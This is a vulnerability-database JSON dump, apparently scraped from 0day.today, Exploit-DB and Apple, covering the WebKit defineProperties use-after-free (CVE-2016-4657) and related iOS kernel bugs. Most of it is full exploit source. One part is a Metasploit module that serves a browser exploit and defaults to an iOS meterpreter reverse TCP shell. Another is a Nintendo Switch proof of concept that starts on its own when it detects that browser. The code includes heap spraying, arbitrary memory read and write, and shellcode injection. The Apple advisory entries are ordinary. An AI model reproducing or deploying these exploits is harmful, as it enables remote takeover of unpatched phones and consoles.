< pressure.length; i++) {\r\n pressure[i] = new Uint32Array(0x10000);\r\n }\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = 0;\r\n }\r\n }\r\n\r\n function swag() {\r\n if (bufs[0]) return;\r\n for (var i = 0; i < 4; i++) {\r\n dgc();\r\n }\r\n for (i = 0; i < bufs.length; i++) {\r\n bufs[i] = new Uint32Array(0x100 * 2)\r\n for (k = 0; k < bufs[i].length;) {\r\n bufs[i][k++] = 0x41414141;\r\n bufs[i][k++] = 0xffff0000;\r\n }\r\n }\r\n }\r\n var trycatch = \"\";\r\n for (var z = 0; z < 0x2000; z++) trycatch += \"try{} catch(e){}; \";\r\n var fc = new Function(trycatch);\r\n var fcp = 0;\r\n var smsh = new Uint32Array(0x10)\r\n\r\n function smashed(stl) {\r\n document.body.innerHTML = \"\";\r\n var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);\r\n write4(jitf, 0xd28024d0); //movz x16, 0x126\r\n write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4\r\n write4(jitf + 8, 0xd4001001); //svc 80\r\n write4(jitf + 12, 0xd65f03c0); //ret\r\n write4(jitf + 16, jitf + 0x20);\r\n write4(jitf + 20, 1);\r\n fc();\r\n var dyncache = read4(jitf + 0x20);\r\n var dyncachev = read4(jitf + 0x20);\r\n var go = 1;\r\n while (go) {\r\n if (read4(dyncache) == 0xfeedfacf) {\r\n for (i = 0; i < 0x1000 / 4; i++) {\r\n if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever\r\n {\r\n go = 0;\r\n break;\r\n }\r\n }\r\n }\r\n dyncache += 0x1000;\r\n }\r\n dyncache -= 0x1000;\r\n var bss = [];\r\n var bss_size = [];\r\n for (i = 0; i < 0x1000 / 4; i++) {\r\n if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {\r\n bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);\r\n bss_size.push(read4(dyncache + i * 4 + (0x28)));\r\n }\r\n }\r\n var shc = jitf;\r\n var filestream = load_binary_resource(\"loader\")\r\n for (var i = 0; i < filestream.length;) {\r\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);\r\n write4(shc, word);\r\n shc += 4;\r\n i += 4;\r\n }\r\n jitf &= ~0x3FFF;\r\n jitf += 0x8000;\r\n write4(shc, jitf);\r\n write4(shc + 4, 1);\r\n // copy macho\r\n for (var i = 0; i < shll.length; i++) {\r\n write4(jitf + i * 4, shll[i]);\r\n }\r\n for (var i = 0; i < bss.length; i++) {\r\n for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {\r\n write4(bss[i] + k * 4, 0);\r\n }\r\n }\r\n fc();\r\n }\r\n\r\n function go_() {\r\n if (smsh.length != 0x10) {\r\n smashed();\r\n return;\r\n }\r\n dgc();\r\n var arr = new Array(0x100);\r\n var yolo = new ArrayBuffer(0x1000);\r\n arr[0] = yolo;\r\n arr[1] = 0x13371337;\r\n var not_number = {};\r\n not_number.toString = function() {\r\n arr = null;\r\n props[\"stale\"][\"value\"] = null;\r\n swag();\r\n return 10;\r\n };\r\n var props = {\r\n p0: {\r\n value: 0\r\n },\r\n p1: {\r\n value: 1\r\n },\r\n p2: {\r\n value: 2\r\n },\r\n p3: {\r\n value: 3\r\n },\r\n p4: {\r\n value: 4\r\n },\r\n p5: {\r\n value: 5\r\n },\r\n p6: {\r\n value: 6\r\n },\r\n p7: {\r\n value: 7\r\n },\r\n p8: {\r\n value: 8\r\n },\r\n length: {\r\n value: not_number\r\n },\r\n stale: {\r\n value: arr\r\n },\r\n after: {\r\n value: 666\r\n }\r\n };\r\n var target = [];\r\n var stale = 0;\r\n Object.defineProperties(target, props);\r\n stale = target.stale;\r\n stale[0] += 0x101;\r\n stale[1] = {}\r\n for (var z = 0; z < 0x1000; z++) fc();\r\n for (i = 0; i < bufs.length; i++) {\r\n for (k = 0; k < bufs[0].length; k++) {\r\n if (bufs[i][k] == 0x41414242) {\r\n stale[0] = fc;\r\n fcp = bufs[i][k];\r\n stale[0] = {\r\n 'a': u2d(105, 0),\r\n 'b': u2d(0, 0),\r\n 'c': smsh,\r\n 'd': u2d(0x100, 0)\r\n }\r\n stale[1] = stale[0]\r\n bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh\r\n bck = stale[0][4];\r\n stale[0][4] = 0; // address, low 32 bits\r\n // stale[0][5] = 1; // address, high 32 bits == 0x100000000\r\n stale[0][6] = 0xffffffff;\r\n mem0 = stale[0];\r\n mem1 = bck;\r\n mem2 = smsh;\r\n bufs.push(stale)\r\n if (smsh.length != 0x10) {\r\n smashed(stale[0]);\r\n }\r\n return;\r\n }\r\n }\r\n }\r\n setTimeout(function() {\r\n document.location.reload();\r\n }, 2000);\r\n }\r\n\r\ndgc();\r\nsetTimeout(go_, 200);\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\n\n# 0day.today [2018-06-05] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30530"}, {"lastseen": "2018-04-09T03:43:07", "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "published": "2018-03-01T00:00:00", "type": "zdt", "title": "Nintendo Switch - WebKit Code Execution (PoC) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4657"], "modified": "2018-03-01T00:00:00", "href": "https://0day.today/exploit/description/29911", "id": "1337DAY-ID-29911", "sourceData": "<!doctype html>\r\n<html>\r\n <head>\r\n <title>CVE-2016-4657 Switch PoC</title>\r\n <style>\r\n body {font-size: 2em;}\r\n a {text-decoration: none; color: #000;}\r\n a:hover {color: #f00; font-weight: bold;}\r\n </style>\r\n </head>\r\n <body>\r\n <h1>CVE-2016-4657 Nintendo Switch PoC</h1>\r\n <ul>\r\n <li><a href=\\'javascript:go();\\'> go!</a></li>\r\n <li><a href=\\'javascript:document.location.reload();\\'> reload</a></li>\r\n </ul>\r\n <div id=\\'status\\'> waiting... click go.</div>\r\n \r\n <script>\r\n // display JS errors as alerts. Helps debugging.\r\n window.onerror = function(error, url, line) {\r\n alert(error+\\' URL:\\'+url+\\' L:\\'+line);\r\n };\r\n </script>\r\n <script>\r\n \r\n // based on jbme.qwertyoruiop.com\r\n // Thanks to:\r\n // + qwertyoruiop\r\n // + Retr0id\r\n // + Ando\r\n //\r\n // saelo\\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html\r\n \r\n // garbage collection stuff\r\n var pressure = new Array(100);\r\n // do garbage collect\r\n dgc = function() {\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = new Uint32Array(0x10000);\r\n }\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = 0;\r\n }\r\n }\r\n \r\n \r\n // access to the overlapping Uint32Array\r\n var bufs = new Array(0x1000);\r\n // we will modify the vector of this\r\n var smash = new Uint32Array(0x10);\r\n // the array with the stale pointer\r\n var stale = 0;\r\n \r\n var _dview = null;\r\n // write 2x 32bit in a DataView and get the Float representation of it\r\n function u2d(low, hi) {\r\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\r\n _dview.setUint32(0, hi);\r\n _dview.setUint32(4, low);\r\n return _dview.getFloat64(0);\r\n }\r\n \r\n function go_() {\r\n // check if the length of the array smash changed already. if yes, bail out.\r\n if (smash.length != 0x10) return;\r\n \r\n // garbage collect\r\n dgc();\r\n \r\n // new array with 0x100 elements\r\n var arr = new Array(0x100);\r\n \r\n // new array buffer of length 0x1000\r\n var yolo = new ArrayBuffer(0x1000);\r\n \r\n // populate the arr with pointer to yolo and a number. not quite sure why.\r\n arr[0] = yolo;\r\n arr[1] = 0x13371337;\r\n \r\n // create an object whos toString function returns number 10 and messes with arr.\r\n var not_number = {};\r\n not_number.toString = function() {\r\n arr = null;\r\n props[\\\"stale\\\"][\\\"value\\\"] = null;\r\n \r\n // if bufs is already overlapping memory, bail out.\r\n if (bufs[0]) return 10;\r\n // really make sure garbage is collected\r\n // the array pointed at by arr should be gone now.\r\n for (var i = 0; i < 20; i++) {\r\n dgc();\r\n }\r\n // for the whole buf Array\r\n for (i = 0; i < bufs.length; i++) {\r\n // fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier\r\n bufs[i] = new Uint32Array(0x100 * 2)\r\n // for each element of that array\r\n for (k = 0; k < bufs[i].length;) {\r\n // set memory to 0x41414141 0xffff0000\r\n // basically spraying the JSValue 0xffff000041414141\r\n // which is the Integer 0x41414141\r\n // phrack: Integer FFFF:0000:IIII:IIII\r\n bufs[i][k++] = 0x41414141;\r\n bufs[i][k++] = 0xffff0000;\r\n }\r\n }\r\n return 10;\r\n };\r\n // define a new object with some properties\r\n var props = {\r\n p0: { value: 0 },\r\n p1: { value: 1 },\r\n p2: { value: 2 },\r\n p3: { value: 3 },\r\n p4: { value: 4 },\r\n p5: { value: 5 },\r\n p6: { value: 6 },\r\n p7: { value: 7 },\r\n p8: { value: 8 },\r\n // the length of this object is set to this object that does evil stuff with toString()\r\n length: { value: not_number },\r\n // the reference to the arr array. Which will later be freed.\r\n stale: { value: arr },\r\n after: { value: 666 }\r\n };\r\n // define a new target array\r\n var target = [];\r\n \r\n // TRIGGER BUG!\r\n // set the properties of the target based on the previously defined ones\r\n Object.defineProperties(target, props);\r\n \r\n // get a reference to the target stale property, which points to arr\r\n stale = target.stale;\r\n \r\n // make sure that the stale[0] points actually to the 0x41414141 data if not, we don\\'t wanna mess with it and try again\r\n if(stale[0]==0x41414141) {\r\n // stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242\r\n stale[0] += 0x101;\r\n //stale[0] = 0x41414242;\r\n //document.getElementById(\\'status\\').innerText = \\'bug done.\\';\r\n // searching the whole memory that is overlaying the old arr. Looking for 0x41414242\r\n for (i = 0; i < bufs.length; i++) {\r\n for (k = 0; k < bufs[0].length; k++) {\r\n // Found the value! bufs[i][k] point now at the same memory as stale[0]\r\n if (bufs[i][k] == 0x41414242) {\r\n alert(\\'Overlapping Arrays found at bufs[\\'+i+\\'][\\'+k+\\']\\\\nsmash.length is still: 0x\\'+smash.length.toString(16));\r\n \r\n // create a new object. Will look kinda like this:\r\n // 0x0100150000000136 0x0000000000000000 <- fictional value\r\n // 0x0000000000000064 0x0000000000000000 <- [\\'a\\'],[\\'b\\']\r\n // 0x???????????????? 0x0000000000000100 <- [\\'c\\'],[\\'d\\']\r\n stale[0] = {\r\n \\'a\\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array\r\n \\'b\\': u2d(0, 0),\r\n \\'c\\': smash, // var pointing at the struct of a Uint32Array(0x10)\r\n \\'d\\': u2d(0x100, 0)\r\n }\r\n \r\n alert(\\'created the JSObject.\\\\nstale[0] = \\'+stale[0]);\r\n \r\n // remember the original stale pointer, pointing at the object with the a,b,c,d properties\r\n stale[1] = stale[0];\r\n \r\n // now add 0x10 to the pointer of stale[0], which points now in the middle of the object.\r\n bufs[i][k] += 0x10;\r\n // check the type of stale[0].\r\n \r\n // removed the loop because it makes the exploit sooooooo unreliable\r\n // based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)\r\n /*while(!(stale[0] instanceof Uint32Array)) {\r\n // if stale[0] is not a Uint32Array yet, increment the structureID guess\r\n structureID++;\r\n \r\n // assign the next structureID to the original object still referenced by stale[1]\r\n stale[1][\\'a\\'] = u2d(structureID, 0);\r\n }*/\r\n \r\n // Give some information. stale[0] should now be a Uint32Array\r\n alert(\\'misaligned the pointer to the JSObject.\\\\nstale[0] = \\'+stale[0]+\\'\\');\r\n \r\n // write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array\r\n // which should point to the struct of smash, allowing us to overwrite the length of smash\r\n stale[0][6] = 0x1337;\r\n \r\n // check the length of smash is now.\r\n alert(\\'smash.length is now: 0x\\'+smash.length.toString(16));\r\n \r\n alert(\\'done!\\\\nswitch will probably crash now :O\\');\r\n return;\r\n }\r\n }\r\n }\r\n }\r\n document.getElementById(\\'status\\').innerText = \\' fail. refresh the page and try again...\\';\r\n setTimeout(function() {document.location.reload();}, 1000);\r\n }\r\n \r\n function go() {\r\n document.getElementById(\\'status\\').innerText = \\' go! \\';\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n setTimeout(go_, 500);\r\n }\r\n \r\n // if Switch browser is detected, auto start exploit\r\n if(navigator.userAgent.indexOf(\\'Nintendo Switch\\')>-1) {\r\n document.getElementById(\\'status\\').innerText = \\'Found Nintendo Switch! \\';\r\n setTimeout(go, 2000);\r\n }\r\n </script>\r\n </body>\r\n</html>\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29911", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "apple": [{"lastseen": "2020-12-24T20:43:25", "bulletinFamily": "software", "cvelist": ["CVE-2016-4656", "CVE-2016-4655", "CVE-2016-4657"], "description": "For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://www.apple.com/support/security/>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 9.3.5\n\nReleased August 25, 2016\n\n**Kernel**\n\nAvailable for: iPhone 4s and later, iPad 2 and later, iPod touch (5th generation) and later\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2016-4655: Citizen Lab and Lookout \n\n**Kernel**\n\nAvailable for: iPhone 4s and later, iPad 2 and later, iPod touch (5th generation) and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2016-4656: Citizen Lab and Lookout\n\n**WebKit**\n\nAvailable for: iPhone 4s and later, iPad 2 and later, iPod touch (5th generation) and later\n\nImpact: Visiting a maliciously crafted website may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2016-4657: Citizen Lab and Lookout\n", "edition": 2, "modified": "2017-01-23T05:30:05", "published": "2017-01-23T05:30:05", "id": "APPLE:HT207107", "href": "https://support.apple.com/kb/HT207107", "title": "About the security content of iOS 9.3.5 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:53", "bulletinFamily": "software", "cvelist": ["CVE-2016-4656", "CVE-2016-4655"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://www.apple.com/support/security/>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Security Update 2016-001 El Capitan and Security Update 2016-005 Yosemite\n\nReleased September 1, 2016\n\n**Kernel**\n\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan v10.11.6\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2016-4655: Citizen Lab and Lookout\n\n**Kernel**\n\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan v10.11.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2016-4656: Citizen Lab and Lookout\n\nSecurity Update 2016-001 El Capitan and Security Update 2016-005 Yosemite include the security content of [Safari 9.1.3](<https://support.apple.com/kb/HT207131>).\n", "edition": 2, "modified": "2017-01-23T05:30:04", "published": "2017-01-23T05:30:04", "id": "APPLE:HT207130", "href": "https://support.apple.com/kb/HT207130", "title": "About the security content of Security Update 2016-001 El Capitan and Security Update 2016-005 Yosemite - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:44", "bulletinFamily": "software", "cvelist": ["CVE-2016-4657"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://www.apple.com/support/security/>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Safari 9.1.3\n\nReleased September 1, 2016\n\n**WebKit**\n\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\n\nImpact: Visiting a maliciously crafted website may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2016-4657: Citizen Lab and Lookout\n", "edition": 2, "modified": "2017-01-23T05:30:04", "published": "2017-01-23T05:30:04", "id": "APPLE:HT207131", "href": "https://support.apple.com/kb/HT207131", "title": "About the security content of Safari 9.1.3 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:39", "bulletinFamily": "software", "cvelist": ["CVE-2016-4655"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://www.apple.com/support/security/>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 10.0.1\n\nReleased September 13, 2016\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2016-4655: Citizen Lab and Lookout\n\niOS 10.0.1 also includes the security content of [iOS 10](<https://support.apple.com/kb/HT207143>).\n", "edition": 2, "modified": "2017-01-23T05:30:01", "published": "2017-01-23T05:30:01", "id": "APPLE:HT207145", "href": "https://support.apple.com/kb/HT207145", "title": "About the security content of iOS 10.0.1 - Apple Support", "type": "apple", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2018-06-05T18:18:55", "description": "WebKit - not_number defineProperties UAF (Metasploit). CVE-2016-4655,CVE-2016-4656,CVE-2016-4657. Remote exploit for iOS platform. Tags: Metasploit Framework...", "published": "2018-06-05T00:00:00", "type": "exploitdb", "title": "WebKit - not_number defineProperties UAF (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4656", "CVE-2016-4655", "CVE-2016-4657"], "modified": "2018-06-05T00:00:00", "id": "EDB-ID:44836", "href": "https://www.exploit-db.com/exploits/44836/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'WebKit not_number defineProperties UAF',\r\n 'Description' => %q{\r\n This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'qwertyoruiop', # jbme.qwertyoruiop.com\r\n 'siguza', # PhoenixNonce\r\n 'tihmstar', # PhoenixNonce\r\n 'timwr', # metasploit integration\r\n ],\r\n 'References' => [\r\n ['CVE', '2016-4655'],\r\n ['CVE', '2016-4656'],\r\n ['CVE', '2016-4657'],\r\n ['BID', '92651'],\r\n ['BID', '92652'],\r\n ['BID', '92653'],\r\n ['URL', 'https://blog.lookout.com/trident-pegasus'],\r\n ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],\r\n ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],\r\n ['URL', 'https://github.com/Siguza/PhoenixNonce'],\r\n ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],\r\n ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],\r\n ],\r\n 'Arch' => ARCH_AARCH64,\r\n 'Platform' => 'apple_ios',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\r\n 'Targets' => [[ 'Automatic', {} ]],\r\n 'DisclosureDate' => 'Aug 25 2016'))\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8080 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use for this exploit.\", \"/\" ])\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Request from #{request['User-Agent']}\")\r\n if request.uri =~ %r{/loader$}\r\n print_good(\"Target is vulnerable.\")\r\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"loader\" )\r\n loader_data = File.read(local_file, {:mode => 'rb'})\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n return\r\n elsif request.uri =~ %r{/exploit$}\r\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"exploit\" )\r\n loader_data = File.read(local_file, {:mode => 'rb'})\r\n payload_url = \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\r\n payload_url_index = loader_data.index('PAYLOAD_URL')\r\n loader_data[payload_url_index, payload_url.length] = payload_url\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n print_status(\"Sent exploit (#{loader_data.size} bytes)\")\r\n return\r\n end\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n function load_binary_resource(url) {\r\n var req = new XMLHttpRequest();\r\n req.open('GET', url, false);\r\n req.overrideMimeType('text/plain; charset=x-user-defined');\r\n req.send(null);\r\n return req.responseText;\r\n }\r\n var mem0 = 0;\r\n var mem1 = 0;\r\n var mem2 = 0;\r\n\r\n function read4(addr) {\r\n mem0[4] = addr;\r\n var ret = mem2[0];\r\n mem0[4] = mem1;\r\n return ret;\r\n }\r\n\r\n function write4(addr, val) {\r\n mem0[4] = addr;\r\n mem2[0] = val;\r\n mem0[4] = mem1;\r\n }\r\n filestream = load_binary_resource(\"exploit\")\r\n var shll = new Uint32Array(filestream.length / 4);\r\n for (var i = 0; i < filestream.length;) {\r\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);\r\n shll[i / 4] = word;\r\n i += 4;\r\n }\r\n _dview = null;\r\n function u2d(low, hi) {\r\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\r\n _dview.setUint32(0, hi);\r\n _dview.setUint32(4, low);\r\n return _dview.getFloat64(0);\r\n }\r\n var pressure = new Array(100);\r\n var bufs = new Array(10000);\r\n dgc = function() {\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = new Uint32Array(0x10000);\r\n }\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = 0;\r\n }\r\n }\r\n\r\n function swag() {\r\n if (bufs[0]) return;\r\n for (var i = 0; i < 4; i++) {\r\n dgc();\r\n }\r\n for (i = 0; i < bufs.length; i++) {\r\n bufs[i] = new Uint32Array(0x100 * 2)\r\n for (k = 0; k < bufs[i].length;) {\r\n bufs[i][k++] = 0x41414141;\r\n bufs[i][k++] = 0xffff0000;\r\n }\r\n }\r\n }\r\n var trycatch = \"\";\r\n for (var z = 0; z < 0x2000; z++) trycatch += \"try{} catch(e){}; \";\r\n var fc = new Function(trycatch);\r\n var fcp = 0;\r\n var smsh = new Uint32Array(0x10)\r\n\r\n function smashed(stl) {\r\n document.body.innerHTML = \"\";\r\n var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);\r\n write4(jitf, 0xd28024d0); //movz x16, 0x126\r\n write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4\r\n write4(jitf + 8, 0xd4001001); //svc 80\r\n write4(jitf + 12, 0xd65f03c0); //ret\r\n write4(jitf + 16, jitf + 0x20);\r\n write4(jitf + 20, 1);\r\n fc();\r\n var dyncache = read4(jitf + 0x20);\r\n var dyncachev = read4(jitf + 0x20);\r\n var go = 1;\r\n while (go) {\r\n if (read4(dyncache) == 0xfeedfacf) {\r\n for (i = 0; i < 0x1000 / 4; i++) {\r\n if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever\r\n {\r\n go = 0;\r\n break;\r\n }\r\n }\r\n }\r\n dyncache += 0x1000;\r\n }\r\n dyncache -= 0x1000;\r\n var bss = [];\r\n var bss_size = [];\r\n for (i = 0; i < 0x1000 / 4; i++) {\r\n if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {\r\n bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);\r\n bss_size.push(read4(dyncache + i * 4 + (0x28)));\r\n }\r\n }\r\n var shc = jitf;\r\n var filestream = load_binary_resource(\"loader\")\r\n for (var i = 0; i < filestream.length;) {\r\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);\r\n write4(shc, word);\r\n shc += 4;\r\n i += 4;\r\n }\r\n jitf &= ~0x3FFF;\r\n jitf += 0x8000;\r\n write4(shc, jitf);\r\n write4(shc + 4, 1);\r\n // copy macho\r\n for (var i = 0; i < shll.length; i++) {\r\n write4(jitf + i * 4, shll[i]);\r\n }\r\n for (var i = 0; i < bss.length; i++) {\r\n for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {\r\n write4(bss[i] + k * 4, 0);\r\n }\r\n }\r\n fc();\r\n }\r\n\r\n function go_() {\r\n if (smsh.length != 0x10) {\r\n smashed();\r\n return;\r\n }\r\n dgc();\r\n var arr = new Array(0x100);\r\n var yolo = new ArrayBuffer(0x1000);\r\n arr[0] = yolo;\r\n arr[1] = 0x13371337;\r\n var not_number = {};\r\n not_number.toString = function() {\r\n arr = null;\r\n props[\"stale\"][\"value\"] = null;\r\n swag();\r\n return 10;\r\n };\r\n var props = {\r\n p0: {\r\n value: 0\r\n },\r\n p1: {\r\n value: 1\r\n },\r\n p2: {\r\n value: 2\r\n },\r\n p3: {\r\n value: 3\r\n },\r\n p4: {\r\n value: 4\r\n },\r\n p5: {\r\n value: 5\r\n },\r\n p6: {\r\n value: 6\r\n },\r\n p7: {\r\n value: 7\r\n },\r\n p8: {\r\n value: 8\r\n },\r\n length: {\r\n value: not_number\r\n },\r\n stale: {\r\n value: arr\r\n },\r\n after: {\r\n value: 666\r\n }\r\n };\r\n var target = [];\r\n var stale = 0;\r\n Object.defineProperties(target, props);\r\n stale = target.stale;\r\n stale[0] += 0x101;\r\n stale[1] = {}\r\n for (var z = 0; z < 0x1000; z++) fc();\r\n for (i = 0; i < bufs.length; i++) {\r\n for (k = 0; k < bufs[0].length; k++) {\r\n if (bufs[i][k] == 0x41414242) {\r\n stale[0] = fc;\r\n fcp = bufs[i][k];\r\n stale[0] = {\r\n 'a': u2d(105, 0),\r\n 'b': u2d(0, 0),\r\n 'c': smsh,\r\n 'd': u2d(0x100, 0)\r\n }\r\n stale[1] = stale[0]\r\n bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh\r\n bck = stale[0][4];\r\n stale[0][4] = 0; // address, low 32 bits\r\n // stale[0][5] = 1; // address, high 32 bits == 0x100000000\r\n stale[0][6] = 